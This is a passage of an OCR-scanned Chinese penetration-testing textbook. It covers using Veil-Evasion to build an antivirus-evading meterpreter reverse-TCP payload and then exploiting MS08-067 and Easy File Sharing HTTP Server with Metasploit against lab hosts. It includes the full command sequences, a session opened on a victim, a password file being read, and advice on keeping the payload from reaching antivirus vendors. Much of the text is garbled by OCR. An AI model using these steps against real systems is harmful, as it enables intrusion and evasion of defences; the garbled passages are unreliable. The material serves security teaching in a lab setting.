Wiki: http:/Jwiki.github.com]oneclick/rubyinstaller 


How about a toolkit For building native C RubyGems? 
DevKit: http://rubyinstaller .org/add-ons]devkit 











i Finish 


K]6-56  ZCRuby26t 


MERIH EAE ZA ina LI EA HAt) SJ Veil-Evasion 了 了， 如 图 6-57 
所 示 。 


root(Qkali: ~ o oso 
File Edit View Search Terminal Help 
:~# Veil-evasionf 





图 6-57 ”启动 Veil-Evasion 


6.6.2 Veil-Evasion!!] [ii Hl 7j 3X: 


打开 Veil-Evasion 后 显示 的 是 一 个 末 持 驱动 的 程序 ， 如 图 6-58 所 示 。 


root@kali: ~ 


File Edit View Search Terminal Help 


Main Menu 


payloads loaded 


Available Commands : 


use Use a specific payload 


info Information on a specific payload 

list List available payloads 

update Update Veil-Evasion to the latest version 
clean Clean out payload folders 

checkvt Check payload hashes vs. VirusTotal 


exit Exit Veil-Evasion 


[menu»»]: J 





6-58 ”Veil-Evasion 的 常用 命令 


在 这 个 程序 中 一 共 为 我 们 提供 了 7 条 可 以 使 用 的 命令 和 51 个 攻击 载 
ff (Payload) ， 我 们 首先 使 用 list 命 令 来 否 看 系统 中 可 以 使 用 的 攻击 载 


倍 ， 如 图 6-59 所 示 。 


root@kali: ~ 


File Edit View Search Terminal Help 


[menu>>]: list 


auxiliary/coldwar wrapper 
auxiliary/macro converter 
auxiliary/pyinstaller wrapper 


c/meterpreter/rev_http 
c/meterpreter/rev_http_service 
c/meterpreter/rev tcp 
c/meterpreter/rev tcp service 
c/shellcode inject/flatc 


cs/meterpreter/rev http 
cs/meterpreter/rev_https 
cs/meterpreter/rev_tcp 


cs/shellcode inject/base64 substitution 


cs/shellcode inject/virtual 


图 6-59  Veil-Evasion"H iH 


在 这 里 我 们 选择 一 个 用 C 语 言 编 
C/meterpreter/rev_tcp， 如 图 6-60 所 示 。 
4*use 6”。 





list 4 A£ payload 


ja 5 HJ foe [e] DC BRI 
这 里 它 的 序号 是 6。 我 们 输入 命 


root@kali: ~ o o o0 
File Edit View Search Terminal Help 


Veil-Evasion | [Version]: 


PayLoad : Loaded 


Name Current Value Description 


COMPILE TO EXE Compile to an executable 
LHOST IP of the Metasploit handler 
LPORT Port of the Metasploit handler 


Available Commands : 


set Set a specific option value 

info Show information about the payload 
options Show payload's options 

generate Generate payload 

back Go to the main menu 

exit exit Veil-Evasion 


[c/meterpreter/rev_tcp>>]: J 





Kl6-60  ZX X C/meterpreter/rev tcp ZA 


和 之 前 的 远程 控制 那 一 章 中 讲解 的 一 样 ， 我 们 需要 设 定 LHOST、 
— 设 定 的 方法 很 傈 单 ， 我 们 首先 来 设 定 LHOST 和 LPORT， 如 图 
6-61 所 示 。 


LHOST 输 入 的 命令 为 “set LHOST 192.168.169.128” 


LPORT 输 入 的 命令 为 “set LPORT 5000" 


[c/meterpreter/rev tcp>>]: set LHOST 192.168.169.128 
[i] LHOST => 192.168.169.128 

[c/meterpreter/rev tcp>>]: set LPORT 5000 

[i] LPORT => 5000 

[c/meterpreter/rev ABE 





图 6-61 设置 C/meterpreterrev_tcp 模 块 的 参数 


和 可 以 使 用 info 命 令 ， 如 图 6-62 
7N o 


root@kali: ~ o © Q0 
File Edit View Search Terminal Help 


c/meterpreter/rev_tcp 

Language: C 

Rating: Excellent 

Description: pure windows/meterpreter/reverse tcp stager, no 
shellcode 


Name Current Value Description 


COMPILE TO EXE Y Compile to an executable 
LHOST 192.168.169.128 IP of the Metasploit handler 
LPORT 5000 Port of the Metasploit handler 


[c/meterpreter/rev tcp»»]: || 





图 6-62  frfrC/meterpreter/rev tcpT ZA IJ Z2 25 


接 下 来 我 们 在 图 6-62 中 输入 “generate” 命 令 来 产生 一 个 攻击 载荷 ， 成 
功 执 行 后 ， 产 生 的 攻击 载 和 傈 说 置 界 面 ， 如 图 6-63 所 示 。 


root@kali: ~ o o Q0 
File Edit View Search Terminal Help 


[>] Please enter the base name for output files (default is 'payload'): E 





Kl6-63 ”为 生成 的 设置 C/meterpreter/rev_tcp 模 块 起 名 


这 里 我 们 需要 为 攻击 载荷 提供 一 个 名 字 ， 默 认 的 话 是 payload， 这 里 
我 将 它 改 为 Hello， 然 后 执行 。 执 行 后 的 结果 如 图 6-64 所 示 。 


root@kali: ~ o o o0 
File Edit View Search Terminal Help 


[*] Executable written to: 
Language: 
Payload: c/meterpreter/rev tcp 
Require i - COMPILE TO EXE-Y  LH0ST-192.168.169.128 
LPORT-50098 
Payload File: /var/lib/veil-evasion/output/source/Hello.c 
Handler File: /var/lib/veil-evasion/output/handlers/Hello handler.rc 


[*] Your payload files have been generated, don't get caught! 


[>] Press any key to return to the main menu. 





Kl6-64 ”成 功 生 成 文件 Hello.exe 


现在 已 经 成 功 生 成 了 文件 Hello.exe。 那 么 我 们 现在 生成 的 被 控 端 文 
件 是 否 可 以 绕 过 杀毒 软件 呢 ? 我 选择 将 生成 的 文件 上 传 到 
http:/www.virscan.org/ 上 进行 检查 ， 这 是 一 蒜 集 成 了 大 量 杀 毒 引 苟 的 在 


线 检 查 ， 如 图 6-65 所 示 。 


浏览 ... Aa F 选择 语言 
VIrSCAN.org S Sikh [l 
i Dur ik 1 你 可 以 上 传 任何 文件 ， 但 是 文件 的 尺寸 不 能 超过 20 兆 。 — 
2, 我 们 支持 RAR 或 ZIP 格 式 的 自动 解压 缩 ; 但 压缩 文件 中 不 能 包含 超过 20 个 文件 。 a 
3. 我 们 可 以 识别 并 检测 密码 为 infectedg 或 virus' 的 压缩 文件 包 。 





导航 栏 关于 VirSCAN 


， 首页 

， 去 往 Virscan.0rg 
; 查看 报告 

» 帮助 我 们 的 文件 或 程序 ， 但 我 们 不 
> BUG 提交 sep 个 新 生 的 病毒 、 木马 或 
> 联系 我 们 





多 种 不 二 
SETA [SERE I: o 











MeN que Zr tre ea gree 它 通 
im à 









经 常 碰 到 隐 友 询问 ， 为 什么 没有 某 某 杀 毒 软件 ， 在 这 里 统一 解释 一 下 ， N 使 用 的 扫描 引擎 均 由 尽 病毒 厂商 提 世 授权 ， 如 果 











支持 厂商 您 在 VirSCAN 中 无 法 找到 您 喜爱 的 某 款 杀毒 软件 时 ， 这 多 数 是 这 个 杀毒 软 Moin SMA VirSCANTEBEDBRSS o 


更 多 
A-SQUARED 


An AhnLab 
&AntiVir 
AHANny 
ARCABIT 目前 引擎 版 本 
Gvastl | | | IE | 


R4 AVG Anti-Virus ANTIVIR 德国 1.9.2.0 1.9.159.0 7.14.13.126 2017-06-22 01:40:49 











E. c ai AVAST! 捷克 170303-1 4.7.4 2017-05-3 2017-06-22 01:02:43 


图 6-65 ”集成 了 六 量 杀 毒 软件 的 在 线 网 站 


可 以 看 到 ， 根 据 virscan 网 站 上 的 信息 ， 大 部 分 的 杀毒 软件 〈 这 里 隐 
去 了 杀毒 软件 广 商 的 名 称 ) 还 是 不 能 发 现 这 个 Payload 的 ， 如 图 6-66 所 
不 。 





必用 现 和 页 
VBS Oecode-NC [Trj 
5/14054 10.0.1405 2017-08-14 公有 发 现 病 玄 
SERIO 
STER AW 
公有 发 现 病 页 
没有 发 现 病毒 
2348: 097€ 2017-06-17 RIMER 
发 有 点 现 病毒 
BAT Downloader 104 
S9 ERAN 
Trojan Script 619787 
SO E HAS 
Trojan Script 619787 
公有 发现 病毒 
BAT/Kryptk B trojan 
S9 EH AW 
Sf 
Troy Vei-E 
公有 发 现 病 玄 
发 有 发 现 病毒 
3 5 beta 3 12 29.5 beta 2017-08-21 SOHO 
21H 





2M, 


Kl6-66 i$ WZRBRÉXTPXSHello.exel] £ zs Zi 
不 过 如 果 你 希望 使 用 这 个 Payload 的 话 ， 最 好 不 要 将 这 个 文件 在 这 
个 网 站 中 进行 测试 一 个 更 好 的 办 法 是 在 本 地 安装 杀毒 软件 进行 测试 ， 
这 是 因为 在 线 杀 毒 网 站 会 将 你 的 Payload 提 交 到 各 大 杀毒 软件 厂 了 两 ，f 


快 这些 Payload 残 会 被 添加 到 新 的 病毒 库 中 了 。 


6.7 ”小结 | 


在 这 一 草 中 我 们 开始 了 渗透 测试 的 一 个 新 的 阶段 ， 在 完成 了 对 目标 
言 轧 的 收集 之 后 ， 终 于 可 以 对 目标 进行 正 陈 的 渗透 了 了 。 在 本 章 最 开始 的 
时 候 ， 我 们 介绍 了 https://www. exploit-db.com/ 网 站 ， 在 这 个 网 站 你 可 以 
找到 这 个 世界 上 大 多 数 漏 铀 的 渗透 模块 ， 而 且 这 些 模块 可 以 直接 运行 。 
接 看 讲解 了 如 何 生成 远程 控制 程序 ， 并 以 Android 和 Windows 作 为 目标 平 
侣 ， 通 过 实例 介绍 了 Metasploit 框 架 中 提供 的 优秀 工具 Meterpreter。 这 个 
Meterpreter 的 功能 极为 强大 。 在 本 和 章 的 最 后 ， 我 们 介绍 了 如 何 产生 一 个 
可 以 不 和 被 杀毒 软件 得 杀 的 方法 。 


从 下 一 章 开 始 ， 我 们 将 会 详细 地 介绍 漏 铜 渗透 模块 的 使 用 和 开 公 。 


"B7 
渗透 攻击 


在 上 古 硕 腊 和 神话 中 有 一 位 著名 的 瑞 雄 一 一 阿 殉 琉 斯 。 他 是 特洛伊 战争 
中 最 伟大 的 布 腊 吴 雄 ， 由 于 全 里 部 被 屋 河 之 水 浸泡 过 ， 所 以 阿 殉 琉 斯 几 
乎 全 映 刀 枪 不 入 ， 人 间 的 了 武 带 都 伤害 不 了 他 。 但 是 他 的 脚 中 却 是 唯一 的 
JJe Hf. DuphkudU Rr d.d IA E r S Bu ART HP RATS TT E o 


"n A 6 HN AS d EB 8 3/6 2 [e] Pu] vs E Er SJ RAS ,— 3 A d 835 L 
Heu m rLFPHPERIDW. (E E—3xrB. RIIA f Ufer f Fdo ed nil 
工具 ， 而 这 一 章 中 我 们 将 会 介绍 如 何 将 远程 控制 软件 的 被 控 问 发 送 到 月 
标 主 机 上 。 而 这 个 过 程 中 最 为 神奇 的 方法 隋 是 对 目标 漏 铜 的 利用 。 前 面 
的 章节 中 已 经 介绍 了 如 何 找 出 目标 的 漏洞 ， 那 么 在 发 现 了 目标 系统 的 漏 
洞 之 后 ， 我 们 接 下 来 的 工作 丈 是 要 利用 漏 铜 渗透 工具 来 给 目标 最 关键 的 
—ih. Mi Metasploit] Z& H BITH 24 525 HJ — 31935 LR. 


本 间 将 围绕 如 下 几 点 来 开始 对 Metasploit 的 学 习 : 


e Metasploit 的 基础 

e Metasploit 的 基本 命令 

。 使 用 Metasploit 对 操作 系统 的 攻击 
e 使 用 Metasploit 对 应 用 程序 的 攻击 
e 使 用 Metasploit 对 各 户 病 发 起 攻击 





7.1 Metasploit 的 基础 


在 以 前 没有 汤 洞 渗透 工具 框架 的 时 候 ， 渗 透 测 试 者 往往 都 需要 上 自己 
收集 漏洞 渗透 用 代码 ， 长 至 需要 目 己 纺 与 针对 漏洞 用 的 代码 。 这 个 时 期 
的 渗透 负 斌 效率 是 比较 低 的 ， 而 且 成 为 一 个 合格 渗透 负 试 者 的 学 习 成 本 
UL AH EA RII o 


2003 年 左右 ， 美 国 的 H.D Moore (世界 著名 的 黑客 ) 和 Spoonm 创 建 
了 一 个 集成 了 多 个 漏 泣 渗透 工具 的 框架 。 随 后 ， 这 个 框 染 在 2004 年 的 世 
TEZLA (Black Hat Briefings). 上 备 受 关注 ，Spoonm 在 大 会 的 演 
讲 中 提 到 ，IMetasploit 的 使 用 如 此 人 简单， 以 全 于 你 只 需要 找到 一 个 目 
标 ， 单 击 几 下 上 妥 标 左 刍 束 可 以 完成 渗透 ， 一 切 束 和 电影 里 面 演 的 一 样 
H o 


强大 的 功能 再 加 上 简单 的 操作 使 得 Metasploit 在 安全 行业 迅速 地 传 
播 开 来 ， 很 快 就 成 为 业内 最 兰 名 的 工具 。 目 前 的 Metasploit 存 在 多 个 版 
本 ， 其 中 既 有 适合 企业 使 用 的 了 商业 版 本 Metasploit Pr0， 也 有 适合 个 人 使 
用 的 免费 版 本 Metasploit Community。 


Kali Linux 2 中 默认 安装 好 了 Metasploit Community， 所 以 本 书 的 讲 
解 将 围绕 这 个 版 本 展开 。 在 Kali Linux 2 中 启动 Metasploit 的 方法 如 图 7-1 
所 示 o 


另外 还 有 两 种 快速 启动 Metasploit 的 方法 。 在 左 侧 的 快捷 工具 栏 中 
可 以 单 击 Metasploit 图 标 局 动 ， 如 图 7-2 所 示 。 


Applications Places v 


Favorites armitage 


01 - Information Gathering 
f beef xss fr... 
02 - Vulnerability Analysis 
03 - Web Application Analysis metasploit . 
04 - Database Assessment A 

msf payloa. 
05 - Password Attacks 


TIT searchsploit 
06 - Wireless Attacks P 


07 - Reverse Engineering social engi... 


08 - Exploitation Tools 

sqlmap 
09 - Sniffing & Spoofing 
10 - Post Exploitation minae 
11 - Forensics 
12 - Reporting Tools 
13 - Social Engineering Tools 
14 - System Services 


Usual applications 


Wine 





图 7-2 ”在 快捷 工具 栏 中 司 动 Metasploit 


也 可 以 打开 一 个 终端 ， 然 后 在 里 面 输入 “msfconsole”。 


root@kali:~# msfconsole 


成 功 启 动 之 后 的 Metasploit 界 面 如 图 7-3 所 示 。 


root@kali: ~ o o o0 
File Edit View Search Terminal Help 


=[ 
-=[ 1659 exploits - 950 auxiliary - 293 post 


] 

PETER ] 
+ -- ---[ 486 payloads - 40 encoders - 9 nops ] 
--=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 





图 7-3 HS Metasploit [f] 


需要 注意 的 是 ， 不 用 在 意 Metasploit 启 动 的 图 案 ， 每 次 可 能 都 不 相 
同 ， 这 次 就 是 一 个 小 牛 的 图 案 。 图 7-3 中 还 给 出 了 当前 metasploit 的 版 本 
为 v4.14.25。 其 中 包含 了 1659 个 exploits、950 个 auxiliary、293 个 post、 
486 个 payloads、40 个 encoders、9 个 nops。 


um o imm 我 们 首先 来 介绍 一 下 常用 模块 


漏洞 渗透 模块 (exploits) : 这 类 模块 正 是 我 们 这 一 半 的 午 点 ， 绝 大 
多 数 人 在 发 现 了 目标 的 漏洞 之 后 ， 往 往 不 知道 接 下 来 如 何 利 用 这 个 漏 
洞 。 而 漏 调 渗 透 模块 则 解决 了 这 个 问题 ， 每 一 个 模块 对 应 看 一 个 漏洞 ， 
发 现 了 目标 的 漏洞 之 后 ， 我 们 无 需 知 道 漏 洞 是 如 何 产 生 的 ， 甚 至 无 需 会 
编程 ， 只 需要 知道 漏洞 的 名 字 ， 然 后 执行 对 应 的 漏 铀 模块， 束 可 以 实现 
对 目标 的 入 侵 。 


攻击 载荷 模块 《payload) : 这 类 模块 就 是 我 们 上 一 章 中 提 到 的 被 控 
端 程序 ， 它 们 可 以 帮助 我 们 在 目标 上 完成 远程 控制 操作 。 通 常 这 些 模块 
既 可 以 单独 执行 ， 也 可 以 和 漏洞 渗透 模块 一 起 执行 。 


辅助 模块 (auxiliary) : 进行 信息 收集 的 模块 ， 例 如 一 些 信 息 侦 
丛 、 网 络 扫 拉 美的 工具 。 


后 渗透 攻击 模块 (post〉: 当 我 们 成 功 地 取得 目标 的 控制 权 之 后 ， 
束 是 这 关 模 块 大 显 号 手 的 时 候 ， 它 可 以 儿 助 我 们 提高 控制 权限 、 获 取 敏 
感 信 息 、 实 施 跳 板 攻击 等 。 


虽然 Metasploit 已 经 极 大 地 人 简化 了 这 些 模 顽 的 操作 ， 但 是 在 没有 操 
作 手 册 的 情况 下 ， 初 学 者 还 是 会 在 这 里 感到 无 从 下 手 。 其 实 大 多 数 非 图 
形 化 工具 都 存在 上 手 困 难 的 问题 ， 所 以 我 们 在 使 用 一 个 命令 式 工 具 的 时 
修 ， 执 行 的 第 一 条 命令 都 是 “help”。 


msf > help 


这 条 命令 执行 完毕 之 后 ，Metasploit 会 将 系统 中 提供 的 命令 都 显示 
tB 下方: 


这 些 命 令 一 共 分 成 以 下 几 个 种 类 ，。 


核心 命令 core command。 

模块 命令 module commands. 

任务 命令 job commands。 

资源 命令 resource script command. 

数据 库 后 台 命 令 database backend command. 

登录 凭证 后 人 台 命 令 credentials backend commands. 


7.2 ”Metasploit 的 基本 命令 


我 们 现在 痛 先 来 熟 秋 一 下 关于 模块 的 命令 ， 这 类 的 命令 使 用 最 多 的 
束 是 show、search 和 use。 首 先 我 们 来 使 用 show 命 令 查 看 Metasploit 中 可 
以 使 用 的 模块 。 


msf > show 


这 样 系统 就 会 列举 出 所 有 的 3000 多 个 模块 。 如 果 我 们 只 是 希望 查看 
其 中 的 某 一 个 种 类 的 模块 ， 束 可 以 使 用 命令 show 加 上 对 应 的 模块 种 类 ， 
例如 查看 漏洞 渗透 模块 束 可 以 使 用 命令 : 





msf > showExploits 








这 时 系统 会 以 分 成 4 列 的 表 显 示 出 所 有 的 漏洞 渗透 模块 ， 见 表 7-1。 
表 7-1 REER 





. | 2008-10- MS08-067 Microsoft Server Service 
DO sa Relative Path Stack Corruption 


NEN M M NNNM. 


这 里 面 漏洞 渗透 模块 的 列 标题 一 共 分 成 4 个 部 分 ， 分 别 是 名 字 
(Name) 、 披 露 日 期 (Disclosure Date? ~ hÆ% (Rank) 和 威胁 描 
述 (Description) . 


FU I dil 18 355 TELE] 4 SEBAHH — EGOXVAPEIE ,— WEH EDS 
的 操作 系统 + 针对 的 服务 + 模块 的 具体 名 称 ” 共 同 组 合 而 成 。 例 如 上 例 中 
Hjwindows/smb/ms08_067_netapi 模 块 的 命名 模式 见 表 7-2。 


表 7-2 JAER IR IN A 


针对 的 操作 系统 针对 的 服务 模块 的 具体 名 称 





披露 日 期 指 的 是 充 漏 洞 友 布 的 日 期 。 


Metasploit H 75811] 22 35 19: E JU) S 2X 7] excellent, great. good. 
normal、average、lowRank、manual。 这 些 等 级 按照 执行 效果 从 好 到 差 
来 划分 ， 例 如 manual 竺 级 的 定义 束 是 该 模 块 几乎 不 可 能 执行 ， 而 
lowRank 指 的 则 是 这 类 模块 很 难 执行 。normal 等 级 指 的 是 可 以 执行 ， 但 
是 对 目标 有 严格 的 要 求 。 而 像 excellent 则 表示 可 以 在 绝 大 多 数 环境 下 正 
E 因此 ， 我 们 选择 漏洞 渗透 模块 的 时 候 ， 尽 量 要 选择 good 以 上 级 
HI) HJ o 


我 们 在 上 一 重 中 已 经 及 现 了 目标 的 系统 中 存在 一 个 漏 铜 ， 那 么 接 下 
来 我 们 该 如 何 使 用 Metasploit 来 对 这 个 漏洞 进行 渗透 呢 ? 


7.3 ”使 用 Metasploit 对 操作 系统 的 攻击 


首先 我 们 以 一 个 黑客 历史 上 最 为 经 典 的 漏洞 来 开始 Metasploit 的 学 
习 。 从 微软 推出 windows 操 作 系 统 以 来 ，2008 年 爆 出 的 MS08-067 漏 洞 无 
论 从 影 啊 力 还 是 破坏 力 上 看 都 是 首届 一 指 的 。 首 先 这 个 漏洞 发 现 的 时 候 
正 是 windows XP 操作 系统 风头 最 盛 的 时 期 ， 当 时 全 志 界 除了 少量 服务 
侣 之 外 ， 几 乎 所 有 的 计算 机 中 使 用 的 都 是 Windows 系 统 ， 而 MS08-067 漏 
洞 当时 对 Windows 2000. Windows XP. Windows Server 2003 的 影响 评 
级 为 严重 ， 对 当时 刚刚 出 现 不 久 的 Windows Vista. Windows Server 
2008. Windows 7 Beta 的 影响 评级 为 重要 ， 也 残 是 说 在 当时 几乎 所 有 的 
计算 机 中 ( 包 插 政府、 军队、 企业、 学 校 以 及 个 人 所 使 用 的 计算 机 〉 都 
存在 着 这 个 漏洞 。 


这 个 漏洞 的 破坏 力 有 多 大 了 呢 ? 它 的 全 称 为 “Windows Server 服 务 RPC 
请 求 缓冲 区 沪 出 漏 将 ”"”， 如 果 用 户 在 受 影 啊 的 系统 上 收 到 特制 的 RPC 请 
求 ， 则 该 汤 润 可 能 允许 远程 执行 代码 。 尤 其 古 在 Windows 2000、 
Windows XP 和 Windows Server 2003 系统 上 ， 攻 击 者 可 能 未 经 身份 验证 
B n] AJ FH HE Yn s $T EE INA 


试想 一 下 ， 如 果 全 世界 的 计算 机 都 被 黑客 控制 ， 这 将 是 一 个 什么 样 
的 景象 呢 ? 而 这 一 切 ， 并 不 是 只 有 在 电影 里 才 会 发 生 的 情节 ， 在 2008 年 
的 时 候 ， 因 为 MS08-067 的 存在 这 已 经 成 为 了 现实 。 


不 过 随 看 微软 针对 这 个 漏洞 的 补丁 的 推出 ， 以 及 新 一 代 操 作 系 统 的 
普及 ， 这 个 漏 铜 产生 的 阴影 渐渐 散 去 。 但 是 这 次 漏洞 的 影响 力 和 破坏 力 
却 为 很 多 人 启 醒 了 管 钟 ， 因 此 很 多 国家 的 政府 部 门 和 和 匣 队 纷纷 放弃 使 用 
微软 的 产品 ， 转 而 使 用 目 行 开 肥 的 操作 系统 。 


好 了 ， 现 在 我 们 先 束 这 个 漏 润 来 尖 示 一 下 Metasploit 的 渗透 过 程 。 


在 这 个 实例 中 我 们 只 需要 两 台 计 算 机 ， 一 人 台 存 在 MS08-067 漏 洞 的 
Windows XP 计 算 机 (〈IP 地 址 为 192.168.169.132) ， 如 图 7-4 所 示 ; 一 台 
用 来 发 起 攻击 的 Kali Linux 2 计算 机 〈IP 地 址 为 192.168.169.130) 。 
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图 7-4 ”目标 Windows XP 计 算 机 


首先 我 们 需要 确定 目标 系统 是 售 存 在 ms08_067 漏 洞 ， 有 很 多 工具 可 
以 实现 这 个 检测 ， 这 里 我 们 使 用 Nmap 来 完成 这 个 任务 ， 这 里 需要 使 用 
有 Nmap 的 一 个 检测 脚本 vuln， 使 用 的 方法 如 图 7-5 所 示 。 


Command: |nmap -sV -p - --script vuln --script-args unsafe 192.168.169.132 


| Hosts | Services - Nmap Output | Ports / Hosts Topology Host Details Scans 


OS Host | nmap -sV -p - --script vuln --script-args unsafe 192.168.169.132 












梧 





| Details | 
A 


ate: VULNERAD 

| IDs: CVE:CVE-2008-4250 

| The Server service in Microsoft Windows 2000 SP4, XP 
SP2 and SP3, Server 2003 SP1 and SP2, 


图 7-5 “使 用 Nmap 对 目标 进行 扫描 
通过 图 7-5 给 出 的 结果 可 以 看 出 这 个 主机 上 存在 痢 MS08_067 漏 洞 。 


首先 要 局 动 Metasploit， 然 后 在 其 中 查找 针对 MS08_067 的 渗透 模 
块 O 


msf > search msO8 067 


得 找 的 结 示 如 图 7-6 所 示 。 


Matching Modules 


Disclosure Date Rank Description 


exploit/windows/smb/ms08 6067_netapi 2008-10-28 great MS08-067 Microsoft Serv 
er Service Relative Path Stack Corruption 





图 7-6 ”查找 到 的 ms8_067_netapi 模 块 


找到 了 这 个 渗透 模块 之 后 束 可 以 使 用 它 了， 在 Metasploit 中 使 
用 “use+ 模 块 名 称 ” 的 方式 来 局 动 一 个 模块 。 


msf > use exploit/windows/smb/msO8 067 netapi 


启动 了 这 个 模块 之 后 ， 我 们 使 用 “show options” 来 查看 这 个 模块 需要 
设置 的 参数 。 


msf exploit(msO8 067 netapi) > show options 


SEIS rfi Se Vt EX IE 306 20 9 RE 7-7 Hz e 


msf exploit( ) » show options 


Module options (exploit/windows/smb/ms08 067 netapi): 


Name Current Setting Required Description 


RHOST The target address 

RPORT 445 The SMB service port (TCP) 

SMBPIPE BROWSER The pipe name to use (BROWSER, SRVSVC) 
Exploit target: 


Id Name 





0 Automatic Targeting 


图 7-7 ms8_067_netapi 模 块 的 参数 
这 里 面 RHOST 是 目标 主机 的 卫 ， 也 融 是 我 们 这 次 实验 中 的 Windows 


E 的 TP 地址 ， 我 们 可 以 使 用 set 加 上 参数 名 称 的 方式 来 为 这 个 参数 赋 


msf exploit(ms88 067 netapi) > set RHOST 192.168.169.132 


如 末 仅 进行 这 个 渗透 ， 就 设置 这 一 参数 即 可 ， 因 为 其 他 的 参数 都 已 


经 有 了 默认 值 。 实际 上 ， ms08 067 _netapi 的 作用 束 是 上 一 草 中 讲 过 的 代 
pe 但 是 仅仅 这 样 还 不 够 ， 我 们 还 需要 代码 B 来 实现 控制 目标 主机 的 
目的 。 


在 上 一 和 章 中 ， 我 们 已 经 介绍 了 如 何 使 用 Meterpreter 来 实现 对 目标 主 
机 的 远程 控制 ， 那么 接 下 来 就 介 绍 如 何在 ms08_067_netapi 模 块 中 机 入 一 
^" Meterpreter, H AG TE BAUER 定 一 个 Payload， 这 里 我 们 仍然 使 用 上 一 
章 介 绍 过 的 reverse_tcp， 命 令 为 set。 


msf exploit(ms68 067 netapi) > set payload windows/meterpreter/reverse tcp 


这 个 Payload 需 要 设置 的 值 包括 LPORT 和 LHOST， 我 们 使 用 set 为 这 
两 个 参数 进行 赋值 。 


msf exploit(msO8 067 netapi) > set LHOST 192.168.169.130 
LHOST -» 192.168.169.130 


msf exploit(msO8 067 netapi) > set LPORT 8888 
LPORT -» 8888 





到 此 为 止 ， 我 们 已 经 完成 了 ms08_067_netapi 模 块 的 全 部 设置 ， 现 在 
MAS AmE I Hs HAY. "img -exploit"1E Z&3x 
ARRIE, Mpix nmn. MERITAR T o 


静 静 地 等 竺 儿 秒 钟 ， 残 可 以 看 到 执行 的 结果 了 ， 如 图 7-8 所 示 。 


Started reverse TCP handler on 192.168.169.130:8888 

192.168.169.132:445 - Automatically detecting the target 

192.168.169.132:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English 

192.168.169.132:445 - Selected Target: Windows XP SP3 English n NX) 

192.168.169.132:445 - Attempting to trigger the vulnerability.. 

Sending stage (957487 bytes) to 192.168.169.132 

Meterpreter session 1 opened (192.168.169.130:8888 -> 192.168.169.132:1158) at 2017 
-10-27 23:04:20 -0400 


meterpreter > J 





图 7-8 ”成 功 建立 的 控制 会 话 


好 了 ， 是 不 是 看 到 了 熟悉 的 “meterpreter>” 了 2? 接 下 来 我 们 就 可 以 像 
上 一 章 利 用 meterpreter 控 制 目标 计算 机 一 样 操 作 了 。 


例如 我 们 使 用 cat 命 令 来 咎 看 目标 主机 C 盘 中 的 password.txt 文 件 ， 如 


图 7-9 所 示 。 





图 7-9 ”使 用 cat 命 令 查 看 文件 


password.txt 的 内 容 如 网 7-10 所 示 。 





图 7-10 password.txt 的 内 容 


切换 到 Windows XP 系统 来 对 比 一 下 。 


好 了 ， 你 可 以 看 到 利用 Metasploit 来 入 侵 一 台 有 漏洞 的 计算 机 是 多 
么 简单 的 事情 了 吧 。 


7.A 使 用 Metasploit 对 应 用 程序 的 攻击 


由 于 Windows 7 使 用 了 比较 安全 的 机 制 ， 所 以 我 们 很 难 像 渗 透 
Windows XPJI FE ECBZTA38 . 


[H xe PE Z8 E Hn S RI BEA SEHE TREATS MERA ER IX 
安 疼 操作 系统 乙 外 ， 还 需要 安 疼 对 应 鸭 Web 及 布 软件 。 当 我 们 在 拘 作 系 
统 上 找 不 到 漏 凋 的 时 候 ， 束 可 以 将 目光 移动 到 上 面 的 应 用 软件 中 。 


例如 我 们 通过 扫描 发 现 目标 系统 上 安装 了 简单 文件 共享 http 服 务 器 
(英文 名 字 为 “Easy File Sharing HTTP Server") ， 这 是 一 款 应 用 得 十 分 
广泛 的 http 服 务 硕 软件 。 但 是 这 和 灵 软 件 在 2015 年 被 发 现 了 一 个 漏 铜 。 随 
即 Metasploit 收 录 了 关于 这 个 漏洞 的 渗透 模块 ， 现 在 我 们 束 利 用 这 个 漏 
洞 来 完成 对 一 个 操作 系统 为 Windows 7 的 目标 进行 渗透 。 


简单 文件 共享 http 服 务 器 的 工作 界面 如 图 7-11 所 示 。 





Stop SSL About 





















































Service... 














图 7-11 ELH SE httpllk $28 


如 条 从 远程 访问 这 个 服务 地 址 ， 例 如 http:/192.168.169.131， 可 以 得 
ZR cre 用 户 输入 用 户 名 和 密码 ， 就 可 以 完成 对 文件 的 
f. 


xr 收藏 夫 | ys 央 建议 网 站 v 央 网 页 快讯 库 了 
Æ Login - powered by Easy File Shar... | m- - C3 d Me ~ 安全 (9) ~ 








Povered by Easy File Sharing Web Server 





@ Internet | 保护 模式 : 禁用 | 144 


图 7-12 ”简单 文件 共 孚 http 服 务 右 的 登录 界面 


那么 我 们 现在 就 对 这 台 服 务 右 友 起 一 次 渗透 测试 ， 自 和 完 局 动 
Metasploit， 局 动 弄 面 如 网 7-13 所 示 。 
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File Edit View Search Terminal Help 
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http://metasploit.com 


sd | ] 
--z[ 1659 exploits - 950 auxiliary - 293 post ] 
--=[ 486 payloads - 40 encoders - 9 nops ] 
--=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 





[7-13 ”Metasploit 的 局 动 界面 
我 们 先 用 “Search” 命 令 来 咎 找 和 Easy File Sharing 有 关 的 模块 。 


msf > search EasyFileSharing 


在 Metasploit 中 但 找到 了 两 个 对 应 的 模块 ， 如 图 7-14 所 示 。 


msf > search EasyFileSharing 


Matching Modules 


Disclosure Date Rank Description 


exploit/windows/ftp/easyfilesharing pass 2006-07-31 average Easy File Sharing FTP Server 2.0 PASS Overflow 
exploit/windows/http/easyfilesharing seh 2015-12-02 normal Easy File Sharin g HTTP Server 7.2 SEH Overflow 





图 7-14 ”查找 到 的 EasyFileSharing 渗 透 模 块 


这 里 我 们 使 用 exploit/windows/http/easyfilesharing_seh 这 个 模块 ， 这 
个 渗透 模块 是 2015 年 年 底 发 布 的 。 


msf > use exploit/windows/http/easyfilesharing seh 


局 动 了 这 个 模块 之 后 ， 我 们 可 以 使 用 “show options” 来 查看 这 个 模块 
的 选项 ， 如 图 7-15 所 示 。 


但 是 需要 注意 的 是 这 里 只 列 出 了 模块 所 需要 的 参数 ， 其 实 我 们 如 采 
想 要 利用 这 个 模块 控制 对 方 计算 机 的 话 ， 还 需要 设置 一 个 攻击 载 集 ， 这 
里 我 们 仍然 使 用 最 为 利用 的 reverse_tcp。 


msf > use exploit/windows/http/easyfilesharing seh 
msf exploit( ) » show options 


Module options (exploit/windows/http/easyfilesharing seh): 


Name Current Setting Required Description 
RHOST The target address 
RPORT 80 The target port (TCP) 


Exploit target: 


6 Easy File Sharing 7.2 HTTP 





